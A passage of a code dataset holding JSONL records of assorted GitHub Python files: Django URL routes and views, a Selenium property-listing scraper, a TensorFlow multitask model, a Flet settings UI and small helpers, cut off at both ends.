'Unfortunately for their mother, Alice and Bob really hate brussel sprouts.'), \n('Does Unfortunately for their parent , Alice and Bob really hate brussel sprouts?', 'Unfortunately for their mother, Alice and Bob really hate brussel sprouts.'), \n('Does Unfortunately for their father , Alice and Bob really hate brussel sprouts?', 'Unfortunately for their mother, Alice and Bob really hate brussel sprouts.'), \n('Does Unfortunately for their mother , Alice and Bob really love brussel sprouts?', 'Unfortunately for their mother, Alice and Bob really hate brussel sprouts.')]\n\n\n\ns5 = 'Alice, who is nice, said hi to me.'\nprint(ask_q(s5))\n\n[('Did Alice , who is nice , say hi to me?', 'Alice, who is nice, said hi to me.'), \n('Did Alice , who is nasty , say hi to me?', 'Alice, who is nice, said hi to me.'), \n('Did Alice , who is nice , say greeting to me?', 'Alice, who is nice, said hi to me.'), \n('Did Alice , who is nice , say hello to me?', 'Alice, who is nice, said hi to me.')]\n\n\n\ns6 = 'Alice said hi, but I forgot to reply.'\nprint(ask_q(s6))\n\n[('Did Alice say hi?', 'Alice said hi.'), \n('Did Alice say greeting?', 'Alice said hi.'), \n('Did Alice say hello?', 'Alice said hi.'), \n('Did I forgot to reply?', 'I forgot to reply.'), \n('Did I forget to reply?', 'I forgot to reply.'), \n('Did I remember to reply?', 'I forgot to reply.'), \n('Did I forgot to answer?', 'I forgot to reply.')]\n\n\ns7 = 'I went to the store, however, Alice said hello.'\nprint(ask_q(s7))\n\n[('Did I go to the store?', 'I went to the store.'), \n('Did I stay_in_place to the store?', 'I went to the store.'), \n('Did I go to the mercantile_establishment?', 'I went to the store.'), \n('Did I go to the shop?', 'I went to the store.'), \n('Did Alice say hello?', 'Alice said hello.'), \n('Did Alice say greeting?', 'Alice said hello.')]\n\n\ns8 = 'Alice ran yesterday.'\nprint(ask_q(s8))\n\n[('Did Alice run yesterday?', 'Alice ran yesterday.'), \n('Did Alice malfunction yesterday?', 'Alice ran yesterday.'), \n('Did Alice run day?', 'Alice ran yesterday.')]\n\n\ns9 = 'Alan Turing liked potatoes because they are delicious.'\nprint(ask_q(s9)) \n\n\n[('Did Alan Turing like potatoes because they are delicious?', 'Alan Turing liked potatoes because they are delicious.')]\n\n\n'''","repo_name":"asam01/11411-QA-Project","sub_path":"asking/compoundBinary.py","file_name":"compoundBinary.py","file_ext":"py","file_size_in_byte":5961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"19106742456","text":"from django.contrib import admin\nfrom django.conf.urls import url, include\nfrom . import views\nadmin.autodiscover()\n\nurlpatterns = [\n url(r'^$', views.home, name='home'),\n url(r'^help/', views.help, name='help'),\n url(r'^users/', include('users.urls')),\n url(r'^tables/', include('tables.urls')),\n url(r'^admin/', admin.site.urls),\n]\n","repo_name":"Blackout76/evepoker","sub_path":"evepoker/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"35926629283","text":"from django.shortcuts import render, HttpResponse\n\nfrom .models import Category, Candidate\nfrom .forms import Submit\n\n\ndef submit_form(request):\n if request.method == 'POST':\n form = Submit(request.POST)\n\n if form.is_valid():\n category = form.cleaned_data.get('category').lower()\n candidate = form.cleaned_data.get('candidate').lower()\n\n if Category.objects.filter(type=category).exists():\n existed_cat = Category.objects.get(type=category)\n new_entry_count = existed_cat.entry_count + 1\n existed_cat.entry_count = new_entry_count\n existed_cat.save()\n\n if Candidate.objects.filter(name=candidate).exists():\n existed_can = Candidate.objects.get(name=candidate)\n new_vote_count = existed_can.vote_count + 1\n existed_can.vote_count = new_vote_count\n existed_can.save()\n else:\n data_2 = Candidate(name=candidate, vote_count=1, category=existed_cat)\n data_2.save()\n else:\n data_1 = Category(type=category, entry_count=1)\n data_1.save()\n\n data_2 = Candidate(name=candidate, vote_count=1, category=Category.objects.get(type=category))\n data_2.save()\n\n return HttpResponse('We registered your form. Category for: {} and your candidate is: {}'\n .format(category, candidate))\n else:\n form = Submit()\n\n return render(request, 'poll/formpage.html', {'form': form})\n","repo_name":"kayyum1905/ananymous_voting_platform","sub_path":"voting_platform/poll/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"2027432206","text":"import csv\nimport json\nimport numpy as np\nfrom fractions import Fraction\n\nclass PhraseGroundtruth:\n\tdef __init__(self, src):\n\t\twith open(src, 'r', encoding='utf-8', errors='ignore') as f:\n\t\t\tcsv_file = [n for n in csv.reader(f)]\n\n\t\t\tself.time_signature = csv_file[0][1].split(' : ')[1]\n\t\t\tself.beats_per_bar, self.note_value \\\n\t\t\t\t\t = list(map(int, self.time_signature.split('/')))\n\t\t\tself.phrases = [n for n in csv_file[1:]]\n\n\t# nth phrase\n\tdef phrase(self, n=1):\n\t\tphrase = list(map(Fraction, self.phrases[n-1][:-2])) + \\\n\t\t\t\t\t\t\t\t\t[self.phrases[n-1][-2]]\n\t\ton_note = phrase[0] + Fraction(phrase[1]/self.beats_per_bar)\n\t\toff_note = phrase[2] + Fraction(phrase[3]/self.beats_per_bar)\n\t\tduration = off_note - on_note + Fraction(phrase[4]/self.beats_per_bar)\n\t\treturn on_note, off_note, duration\n\n\tdef phrase_in_ratio(self):\n\t\tphrases = []\n\t\tfor n in range(len(self.phrases)):\n\t\t\tphrases += [self.phrase(n)[1]] + [self.phrase(n)[0]]\n\t\treturn np.unique(phrases)\n\n\tdef phrase_in_measure(self):\n\t\tphrases = []\n\t\tfor n in range(len(self.phrases)):\n\t\t\ton, off, _ = self.phrase(n)\n\t\t\tphrases.append(int(on))\n\t\t\tphrases.append(int(off))\n\t\treturn np.unique(phrases)\n\nclass Syncopation:\n\tdef __init__(self, path='../data/Syncopation', score='b_20_1', model='WNBD', track='R'):\n\t\tself.src = ('%s/%s_syncopation/%s_%s_%s.json')%(path, score, score, model, track)\n\t\twith open(self.src) as f:\n\t\t\tself.values = json.load(f)\n\t\t#\n\t\tself.syncopation = [0 for _ in range(self.values['number_of_bars'])]\n\t\tfor n in (self.values)['bars_with_valid_output']:\n\t\t\tself.syncopation[n] = (self.values)['syncopation_by_bar'][n]\n\t\n\tdef syncopation_by_bar(self):\n\t\treturn self.syncopation\n\tdef syncopation_by_measure(self, measure=1):\n\t\treturn self.syncopation[measure-1]\n\tdef syncopation_by_measures(self, on_measure=1, off_measure=2):\n\t\tif on_measure <= 0:\n\t\t\ton_measure = 1\n\t\tif off_measure < 0:\n\t\t\toff_measure = len(self.ssyncopation)-off_measure\n\t\treturn self.syncopation[on_measure-1:off_measure]\n\tdef mean_per_bar(self):\n\t\treturn self.values['mean_syncopation_per_bar']\n\tdef feature(self, method=0):\n\t\tif method==0:\n\t\t\treturn [((self.syncopation)[i]-(self.syncopation)[i-1]) for i in range(1, len(self.syncopation))]\n\n","repo_name":"ginedoc/Rhythm-Distance","sub_path":"src/PhraseGroundtruth.py","file_name":"PhraseGroundtruth.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"31471324692","text":"from core.constants import DATASET_LABEL_NAME, DATASET_TRAIN_RATIO, MENU_EXIT, MENU_RETURN, \\\n SIGNIFICANT_FEATURE_SET_COUNTS\nfrom core.constants_feature_set import SIGNIFICANT_RIDGE_COLUMNS, SIGNIFICANT_BINARY_LABEL_COLUMNS, \\\n SIGNIFICANT_FORWARD_STEPWISE_COLUMNS\nfrom core.data_analysis import perform_linear_regression_analysis, perform_polynomial_complexity_analysis, \\\n perform_lasso_lambda_analysis, perform_ridge_lambda_analysis, perform_feature_correlation_analysis, \\\n perform_svc_analysis\nfrom core.data_visualization import generate_classification_plots, \\\n generate_scatter_plots, generate_histogram_plots, generate_compound_plots, generate_correlation_plots\nfrom core.loader import load_train_dataset, load_standardized_train_dataset, load_determining_dataset\nfrom core.model_exporter import handle_model_export\nfrom core.predict import predict_submission1_ridge, predict_submission1_propagation, predict_submission2, \\\n predict_submission3, predict_submission4\nfrom core.preprocessing import split_training_test, split_claims_accept_reject, \\\n separate_features_label, convert_label_binary, get_categorical_columns, expand_dataset_deterministic\nfrom library.option_input import OptionInput\n\n\ndef run_menu(title, options):\n exit_menu = None\n while exit_menu is None:\n print(f'--- {title} ---')\n option_input = OptionInput('Select option', options, lambda option: option[0])\n _, option = option_input.get_input()\n exit_menu = option()\n\n return exit_menu\n\ndef run_dataset_menu():\n return run_menu('Load dataset', [\n ('Train dataset', load_train_dataset),\n ('Train dataset - Standardized', load_standardized_train_dataset),\n ])\n\ndef main():\n dataset_raw = run_dataset_menu()\n\n raw_features, raw_label = separate_features_label(dataset_raw, DATASET_LABEL_NAME)\n\n categorical_columns = get_categorical_columns(raw_features)\n dataset_expanded = expand_dataset_deterministic(dataset_raw, load_determining_dataset(), categorical_columns)\n\n expanded_features, expanded_label = separate_features_label(dataset_expanded, DATASET_LABEL_NAME)\n\n binary_label = convert_label_binary(expanded_label)\n\n (accept_features, accept_label), (reject_features, reject_label) = split_claims_accept_reject(\n expanded_features,\n expanded_label\n )\n\n def run_dev_test():\n # Intended for temporary development tests\n # Run whatever you want here\n pass\n\n def prediction_menu():\n run_menu('Model prediction menu', [\n ('Submission 1: Ridge', lambda: predict_submission1_ridge(dataset_raw)),\n ('Submission 1: Propagation', lambda: predict_submission1_propagation(dataset_raw)),\n ('Submission 2', lambda: predict_submission2(dataset_raw)),\n ('Submission 3', lambda: predict_submission3(dataset_raw)),\n ('Submission 4', lambda: predict_submission4(dataset_raw)),\n MENU_RETURN\n ])\n\n def analysis_menu(features, label):\n train_data, test_data = split_training_test(\n features,\n label,\n DATASET_TRAIN_RATIO\n )\n\n run_menu('Data analysis menu', [\n ('Perform feature correlation analysis', lambda: perform_feature_correlation_analysis(features)),\n ('Perform linear regression analysis', lambda: perform_linear_regression_analysis(train_data, test_data)),\n ('Perform polynomial complexity analysis', lambda: perform_polynomial_complexity_analysis(train_data, test_data)),\n ('Perform lasso lambda analysis', lambda: perform_lasso_lambda_analysis(train_data, test_data)),\n ('Perform ridge lambda analysis', lambda: perform_ridge_lambda_analysis(train_data, test_data)),\n ('Perform SVC penalty analysis', lambda: perform_svc_analysis(train_data, test_data)),\n MENU_RETURN\n ])\n\n def visualization_menu(features, label):\n print(features.columns)\n run_menu('Data visualization menu', [\n ('Generate scatter plots', lambda: generate_scatter_plots(features, label)),\n ('Generate histogram plots', lambda: generate_histogram_plots(features)),\n ('Generate compound plots', lambda: generate_compound_plots(features, label)),\n ('Generate correlation plots', lambda: generate_correlation_plots(features)),\n ('Generate classification plots', lambda: generate_classification_plots(features, label)),\n MENU_RETURN\n ])\n\n def featureset_menu(features, label, on_select):\n def select_features(features, label, feature_columns):\n return lambda: feature_count_menu(lambda count: on_select(\n features.loc[:, feature_columns[:count]],\n label\n ))\n\n def feature_count_menu(on_select):\n def get_option(count):\n return f'{count}', lambda: on_select(count)\n\n run_menu(\"Select feature set count\", [\n *[\n get_option(count) for count\n in SIGNIFICANT_FEATURE_SET_COUNTS\n ],\n MENU_RETURN,\n ])\n\n run_menu(\"Select feature set\", [\n ('All', lambda: on_select(features, label)),\n ('Significant: Ridge', select_features(features, label, SIGNIFICANT_RIDGE_COLUMNS)),\n ('Significant: Ridge binary label', select_features(features, label, SIGNIFICANT_BINARY_LABEL_COLUMNS)),\n ('Significant: Forward stepwise', select_features(features, label, SIGNIFICANT_FORWARD_STEPWISE_COLUMNS)),\n MENU_RETURN\n ])\n\n def data_selection_menu(title, on_select):\n def select_featureset(features, label):\n return lambda: featureset_menu(features, label, on_select)\n\n run_menu(title, [\n ('Expanded: Data', select_featureset(expanded_features, expanded_label)),\n ('Expanded: Binary label data', select_featureset(expanded_features, binary_label)),\n ('Expanded: Accepted claim data', select_featureset(accept_features, accept_label)),\n ('Expanded: Rejected claim data', select_featureset(reject_features, reject_label)),\n ('Raw: Data', lambda: on_select(raw_features, raw_label)),\n ('Raw: Binary label data', lambda: on_select(raw_features, binary_label)),\n ('Raw: Categorical', lambda: on_select(raw_features.loc[:, categorical_columns], raw_label)),\n MENU_RETURN\n ])\n\n def main_menu():\n run_menu('Main menu', [\n ('Run dev test', run_dev_test),\n ('Generate data visualization plots', lambda: (\n data_selection_menu('Select visualization data', visualization_menu)\n )),\n ('Perform data analysis', lambda: (\n data_selection_menu('Select analysis data', analysis_menu)\n )),\n ('Run model prediction', prediction_menu),\n ('Export competition model', handle_model_export),\n MENU_EXIT\n ])\n\n main_menu()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Samuel-collab2/mysterydata","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"32825465381","text":"# Custom user-defined exception\nclass CustomError(Exception):\n def __init__(self, message):\n self.message = message\n\n\n# Function demonstrating raising an exception\ndef divide_numbers(a, b):\n try:\n if b == 0:\n raise CustomError('Division by zero is not allowed')\n result = a / b\n except CustomError as e:\n print('Custom exception: ', e.message)\n\n except ZeroDivisionError:\n print('Error: Division by zero')\n else:\n print('Division successful. Result: ', result)\n finally:\n print('Division operation completed.')\n\n\n# Main block\ntry:\n # Example of raising exception and specific exception handling\n num1 = 10\n num2 = 2\n divide_numbers(num1, num2)\n\n # handling multiple exceptions\n num3 = 10\n num4 = 0\n divide_numbers(num3, num4)\n\nexcept CustomError as ce:\n print('Custom error handled within main block: ', ce.message)\nexcept ZeroDivisionError:\n print('Error: Division by zero')\nexcept Exception as ex:\n print('An unexpected error ocurred: ', ex)","repo_name":"luisAlcides/Learn_Python","sub_path":"intermediate/09_Exceptions/10_Practice.py","file_name":"10_Practice.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"74089261838","text":"from django.urls import path, re_path\nfrom . import views\n\napp_name = 'blogpost'\nurlpatterns = [\n path('create/', views.create_blog_view, name='create'),\n path('/', views.detail_blog_view, name='detail'),\n path('/update', views.update_blog_view, name='update'),\n path('/delete/', views.delete_blog_view, name='delete'),\n path('/favorite/', views.favorite_view, name='favorite'),\n\n]\n","repo_name":"BahaaIbrahim3024/Blog","sub_path":"blogPost/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"8629743835","text":"from rich import print\nfrom rich.console import Console\n\nfrom or_globalvars import vars\n\nconsole = Console()\n# Possible starting dates\n\n# Weekday names array\nweekdays = [\n \"SATURDAY\",\n \"SUNDAY\",\n \"MONDAY\",\n \"TUESDAY\",\n \"WEDNESDAY\",\n \"THURSDAY\",\n \"FRIDAY\",\n]\n\n\ndef get_date():\n \"\"\"Determines which turn it is, creates a date based off turn #\n Args:\n turn_number (Month, Day): Sets possible dates\n \"\"\"\n return f\"{vars.dates[0]}, {vars.current_date}\"\n\n\ndef print_weekday(amount):\n \"\"\"Function for determining day of the week\"\"\"\n return weekdays[amount % 7]\n\n\ndef print_final_date(d3):\n \"\"\"Determines final date based off origin\"\"\"\n # mar 29 -> dec 20 1847 = 266 days\n weekday = print_weekday(d3)\n # dec 1 = 246 days\n if d3 > 246:\n return \"{} DECEMBER {} 1847\".format(weekday, d3 - 246)\n elif d3 > 216:\n return \"{} NOVEMBER {} 1847\".format(weekday, d3 - 216)\n elif d3 > 185:\n return \"{} OCTOBER {} 1847\".format(weekday, d3 - 185)\n elif d3 > 155:\n return \"{} SEPTEMBER {} 1847\".format(weekday, d3 - 155)\n elif d3 > 125:\n return \"{} AUGUST {} 1847\".format(weekday, d3 - 124)\n else:\n return \"{} JULY {} 1847\".format(weekday, d3 - 93)\n","repo_name":"JackMorash/RPG","sub_path":"or_dates.py","file_name":"or_dates.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"4712331877","text":"import flet as ft\n\n\nclass SettingGmail(ft.UserControl):\n def __init__(self, gmail: str):\n \"\"\"設定タブのGmail欄のコンポーネント\n\n Parameters\n ----------\n gmail : str\n ストレージに保存されているgmailアドレス\n \"\"\"\n super().__init__()\n self.gmail = ft.TextField(label=\"Gmail\", value=gmail)\n\n def build(self):\n return self.gmail\n\n @property\n def value(self):\n return self.gmail.value\n\n @value.setter\n def value(self, value):\n self.gmail.value = value\n\n\nclass SettingCredentialsPath(ft.UserControl):\n def __init__(self, credentials_path):\n \"\"\"設定タブの認証情報欄のためのコンポーネント\n\n Parameters\n ----------\n credentials_path : str\n 認証情報が記述されているファイルのパス\n on_click\n コンポーネントのボタンをクリックした時実行する関数\n \"\"\"\n super().__init__()\n self.selected_files = ft.TextField(label=\"認証情報\", value=credentials_path)\n self.file_dialog = ft.FilePicker(on_result=self.pick_files_result)\n\n def build(self):\n return ft.Column(\n [\n self.selected_files,\n ft.ElevatedButton(\n \"認証ファイルを選択\",\n icon=ft.icons.UPLOAD_FILE,\n on_click=lambda _: self.file_dialog.pick_files(),\n height=40,\n elevation=3,\n ),\n ]\n )\n\n def pick_files_result(self, e: ft.FilePickerResultEvent):\n if not e.files:\n return\n self.value = e.files[0].path\n self.update()\n\n @property\n def value(self):\n return self.selected_files.value\n\n @value.setter\n def value(self, value):\n self.selected_files.value = value\n\n\nclass SettingTab(ft.UserControl):\n def __init__(self, setting_list: list, names: list, client_storage: ft.Page):\n \"\"\"設定タブコンポーネント\n\n Parameters\n ----------\n setting_list : list\n 設定タブに表示するコンポーネントのリスト\n add_settings\n 設定を適用する時用の関数\n \"\"\"\n super().__init__()\n self.setting_list = setting_list\n self.names = names\n self.client_storage = client_storage\n\n def set_storage(self, e):\n if self.client_storage is not None:\n for name, setting in zip(self.names, self.setting_list):\n self.client_storage.set(name, setting.value)\n\n def add_setting(self, e):\n self.button.text = \"登録しました\"\n self.button.icon = \"check\"\n self.update()\n self.set_storage(e)\n\n def default(self, e):\n if e.data:\n self.button.text = \"情報を登録\"\n self.button.icon = \"save\"\n self.update()\n\n def build(self):\n self.button = ft.ElevatedButton(\n \"情報を登録\",\n icon=\"save\",\n on_click=self.add_setting,\n on_hover=self.default,\n height=50,\n width=200,\n style=ft.ButtonStyle(\n color={\n ft.MaterialState.DEFAULT: ft.colors.WHITE,\n },\n bgcolor={\n ft.MaterialState.DEFAULT: ft.colors.BLUE_700,\n ft.MaterialState.HOVERED: ft.colors.BLUE_900,\n },\n shape=ft.RoundedRectangleBorder(radius=20),\n ),\n )\n return ft.Column(\n [\n *[\n ft.Container(setting, margin=ft.margin.only(bottom=30))\n for setting in self.setting_list\n ],\n self.button,\n ]\n )\n","repo_name":"KubotaDaiki/lecture-sync","sub_path":"src/component/setting_tab.py","file_name":"setting_tab.py","file_ext":"py","file_size_in_byte":3883,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"4731530327","text":"import re\n\nfrom flask import request\n\n\ndef get_filter_query():\n filter = {}\n\n for field in request.args.to_dict():\n match = re.match('filters\\[(.*)\\]', field)\n if match is not None:\n filter[match.group(1)] = request.args.get(field)\n\n match = re.match('filters\\[(.*)\\]\\[(.*)\\]', field)\n if match is not None:\n filter[match.group(1)][match.group(2)] = request.args.get(field)\n\n return filter\n\n\ndef parse_multi_form(form):\n data = {}\n for url_k in form:\n v = form[url_k]\n ks = []\n while url_k:\n if '[' in url_k:\n k, r = url_k.split('[', 1)\n ks.append(k)\n if r[0] == ']':\n ks.append('')\n url_k = r.replace(']', '', 1)\n else:\n ks.append(url_k)\n break\n sub_data = data\n for i, k in enumerate(ks):\n if k.isdigit():\n k = int(k)\n if i + 1 < len(ks):\n if not isinstance(sub_data, dict):\n break\n if k in sub_data:\n sub_data = sub_data[k]\n else:\n sub_data[k] = {}\n sub_data = sub_data[k]\n else:\n if isinstance(sub_data, dict):\n sub_data[k] = v\n return data\n","repo_name":"vortexgin/simple-python-sqlite","sub_path":"helper/HttpHelper.py","file_name":"HttpHelper.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"25492568515","text":"from datetime import datetime\r\nimport asyncio\r\n\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.common.exceptions import WebDriverException\r\nfrom tinydb import Query\r\n\r\nfrom alarm import sound_alarm\r\n\r\n# Define the format for the timestamp\r\ntimestamp_format = '%Y%m%d %H:%M:%S'\r\n\r\n\r\ndef scrape(webdriver, search_address, database, chat_id):\r\n # Open the provided search address in the WebDriver\r\n webdriver.get(search_address)\r\n\r\n # Find the result list element using its XPath\r\n result_list_xpath = '//*[@id=\"cope_ref\"]/section[2]/ol'\r\n result_list = webdriver.find_element(By.XPATH, result_list_xpath)\r\n\r\n # Retrieve all the individual result items from the result list\r\n results = result_list.find_elements(By.CSS_SELECTOR, 'li')\r\n\r\n # Initialize a counter to keep track of added listings\r\n added_listings = 0\r\n\r\n for result in results:\r\n # Filter out ads\r\n if result.get_attribute(\"class\") != \"J04SL w-full\":\r\n continue\r\n attempts = 0\r\n\r\n # Initialize a dictionary to store the listing details\r\n property_listing = {\r\n 'link': '',\r\n 'price': '',\r\n 'address': '',\r\n 'type': ''\r\n }\r\n\r\n # Initialize variables to track errors during scraping\r\n errors = \"\"\r\n error_occurred = False\r\n\r\n while attempts < 2:\r\n error_occurred = False\r\n\r\n try:\r\n # Retrieve the link element for the property listing\r\n link = result.find_element(By.CSS_SELECTOR, 'a')\r\n property_listing['link'] = link.get_property(\"href\")\r\n except WebDriverException as e:\r\n errors += e.msg + '\\n'\r\n error_occurred = True\r\n\r\n try:\r\n # Retrieve the information container for the property listing\r\n info = result.find_element(By.XPATH, './a/section/section[1]/ul')\r\n except WebDriverException as e:\r\n errors += e.msg + '\\n'\r\n error_occurred = True\r\n else:\r\n try:\r\n info_elements = info.find_elements(By.CSS_SELECTOR, 'li')\r\n # Retrieve the price information for the property listing\r\n price = info_elements.pop(-1)\r\n property_listing['price'] = price.text.replace('\\u20ac', '')\r\n for info_element in info_elements:\r\n property_listing['type'] += info_element.text + ' | '\r\n except WebDriverException as e:\r\n errors += e.msg + '\\n'\r\n error_occurred = True\r\n\r\n try:\r\n # Retrieve the address information for the property listing\r\n address = result.find_element(By.CSS_SELECTOR, 'address')\r\n property_listing['address'] = address.text\r\n except WebDriverException as e:\r\n errors += e.msg + '\\n'\r\n error_occurred = True\r\n\r\n if not error_occurred:\r\n break\r\n\r\n attempts += 1\r\n\r\n # Add the timestamp to the property listing\r\n property_listing['time'] = datetime.now().strftime(timestamp_format)\r\n\r\n entries = Query()\r\n\r\n if error_occurred:\r\n # Print any errors that occurred during scraping\r\n print(errors)\r\n elif not database.contains(entries.link == property_listing['link']):\r\n # Insert the property listing into the database if it's not a duplicate\r\n database.insert(property_listing)\r\n added_listings += 1\r\n\r\n # Run the sound_alarm function asynchronously to trigger a notification\r\n asyncio.run(sound_alarm(property_listing, chat_id))\r\n\r\n # Print the number of added listings after the scraping is complete\r\n print(\"Added \" + str(added_listings) + \" listings\")\r\n","repo_name":"Turtarbot/Property_Alarm","sub_path":"immoscout_at_scraper.py","file_name":"immoscout_at_scraper.py","file_ext":"py","file_size_in_byte":3952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"33654848879","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\n\nfrom model import encoder\nfrom model import shared_inputs\n\n\nclass Inference(object):\n def __init__(self, config, inputs, pretrained_embeddings, tasks):\n with tf.variable_scope('encoder'):\n self.encoder = encoder.Encoder(config, inputs, pretrained_embeddings)\n self.modules = {}\n for task in tasks:\n with tf.variable_scope(task.name):\n self.modules[task.name] = task.get_module(inputs, self.encoder)\n\n\nclass Model(object):\n def __init__(self, config, pretrained_embeddings, tasks):\n self._config = config\n self._tasks = tasks\n\n self._global_step, self._optimizer = self._get_optimizer()\n self._inputs = shared_inputs.Inputs(config)\n with tf.variable_scope('model', reuse=tf.AUTO_REUSE) as scope:\n inference = Inference(config, self._inputs, pretrained_embeddings,\n tasks)\n self._trainer = inference\n self._tester = inference\n self._teacher = inference\n if config.ema_test or config.ema_teacher:\n ema = tf.train.ExponentialMovingAverage(config.ema_decay)\n model_vars = tf.get_collection(\"trainable_variables\", \"model\")\n ema_op = ema.apply(model_vars)\n tf.add_to_collection(tf.GraphKeys.UPDATE_OPS, ema_op)\n\n def ema_getter(getter, name, *args, **kwargs):\n var = getter(name, *args, **kwargs)\n return ema.average(var)\n\n scope.set_custom_getter(ema_getter)\n inference_ema = Inference(\n config, self._inputs, pretrained_embeddings, tasks)\n if config.ema_teacher:\n self._teacher = inference_ema\n if config.ema_test:\n self._tester = inference_ema\n\n self._unlabeled_loss = self._get_consistency_loss(tasks)\n self._unlabeled_train_op = self._get_train_op(self._unlabeled_loss)\n self._labeled_train_ops = {}\n for task in self._tasks:\n task_loss = self._trainer.modules[task.name].supervised_loss\n self._labeled_train_ops[task.name] = self._get_train_op(task_loss)\n\n def _get_consistency_loss(self, tasks):\n return sum([self._trainer.modules[task.name].unsupervised_loss\n for task in tasks])\n\n def _get_optimizer(self):\n global_step = tf.get_variable('global_step', initializer=0, trainable=False)\n warm_up_multiplier = (tf.minimum(tf.to_float(global_step),\n self._config.warm_up_steps)\n / self._config.warm_up_steps)\n decay_multiplier = 1.0 / (1 + self._config.lr_decay *\n tf.sqrt(tf.to_float(global_step)))\n lr = self._config.lr * warm_up_multiplier * decay_multiplier\n optimizer = tf.train.MomentumOptimizer(lr, self._config.momentum)\n return global_step, optimizer\n\n def _get_train_op(self, loss):\n grads, vs = zip(*self._optimizer.compute_gradients(loss))\n grads, _ = tf.clip_by_global_norm(grads, self._config.grad_clip)\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n return self._optimizer.apply_gradients(\n zip(grads, vs), global_step=self._global_step)\n\n def _create_feed_dict(self, mb, model, is_training=True):\n feed = self._inputs.create_feed_dict(mb, is_training)\n if mb.task_name in model.modules:\n model.modules[mb.task_name].update_feed_dict(feed, mb)\n else:\n for module in model.modules.values():\n module.update_feed_dict(feed, mb)\n return feed\n\n def train_unlabeled(self, sess, mb):\n return sess.run([self._unlabeled_train_op, self._unlabeled_loss],\n feed_dict=self._create_feed_dict(mb, self._trainer))[1]\n\n def train_labeled(self, sess, mb):\n return sess.run([self._labeled_train_ops[mb.task_name],\n self._trainer.modules[mb.task_name].supervised_loss,],\n feed_dict=self._create_feed_dict(mb, self._trainer))[1]\n\n def run_teacher(self, sess, mb):\n result = sess.run({task.name: self._teacher.modules[task.name].probs\n for task in self._tasks},\n feed_dict=self._create_feed_dict(mb, self._teacher,\n False))\n for task_name, probs in result.iteritems():\n mb.teacher_predictions[task_name] = probs.astype('float16')\n\n def test(self, sess, mb):\n return sess.run(\n [self._tester.modules[mb.task_name].supervised_loss,\n self._tester.modules[mb.task_name].preds],\n feed_dict=self._create_feed_dict(mb, self._tester, False))\n\n def get_global_step(self, sess):\n return sess.run(self._global_step)\n","repo_name":"tensorflow/models","sub_path":"research/cvt_text/model/multitask_model.py","file_name":"multitask_model.py","file_ext":"py","file_size_in_byte":4702,"program_lang":"python","lang":"en","doc_type":"code","stars":76227,"dataset":"github-code","pt":"29"} +{"seq_id":"32945805229","text":"from datetime import datetime\n\nfrom django.core.files.uploadedfile import InMemoryUploadedFile\nfrom django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render\nfrom django.views.generic import ListView, FormView, CreateView\n\nfrom cleanup.models import DeleteFile\nfrom position_rec.forms import AccountFundPositionRecForm, PositionRecAttachmentsForm\nfrom position_rec.models import AccountFundPositionRec, PositionRecAttachments\n\n\nclass AccountFundPositionRecView(FormView):\n template_name = \"create_account.html\"\n form_class = AccountFundPositionRecForm\n success_url = '#'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n queryset = AccountFundPositionRec.objects.all()\n context['account_list'] = queryset\n return context\n\n def form_valid(self, form):\n data = form.cleaned_data\n account_id_to_edit = self.request.POST.get('account_id_to_edit')\n third_party = data.get('third_party')\n account_no = data.get('account_no')\n mnemonic = data.get('mnemonic')\n type = data.get('type')\n fund = data.get('fund')\n excluded = data.get('excluded')\n date_updated = datetime.now()\n create_new_account = False if account_id_to_edit else True\n if not create_new_account:\n try:\n account_obj = AccountFundPositionRec.objects.get(id=account_id_to_edit)\n account_obj.third_party = third_party\n account_obj.account_no = account_no\n account_obj.mnemonic = mnemonic\n account_obj.type = type\n account_obj.fund = fund\n account_obj.excluded = excluded\n account_obj.date_updated = date_updated\n account_obj.save()\n create_new_account = False\n except AccountFundPositionRec.DoesNotExist:\n create_new_account = True\n if create_new_account:\n AccountFundPositionRec.objects.create(third_party=third_party, account_no=account_no,\n mnemonic=mnemonic, type=type, fund=fund, excluded=excluded,\n date_updated=date_updated)\n return super(AccountFundPositionRecView, self).form_valid(form)\n\n\ndef get_account_details(request):\n \"\"\" Retreives all the details for the requested Account \"\"\"\n if request.method == 'POST':\n account_id = request.POST['account_id']\n account_details = {}\n try:\n account = AccountFundPositionRec.objects.get(id=account_id)\n account_details['third_party'] = account.third_party\n account_details['account_no'] = account.account_no\n account_details['mnemonic'] = account.mnemonic\n account_details['type'] = account.type\n account_details['fund'] = account.fund\n account_details['excluded'] = account.excluded\n except AccountFundPositionRec.DoesNotExist:\n account_details = []\n\n return JsonResponse({'account_details': account_details})\n\n\ndef delete_account(request):\n response = 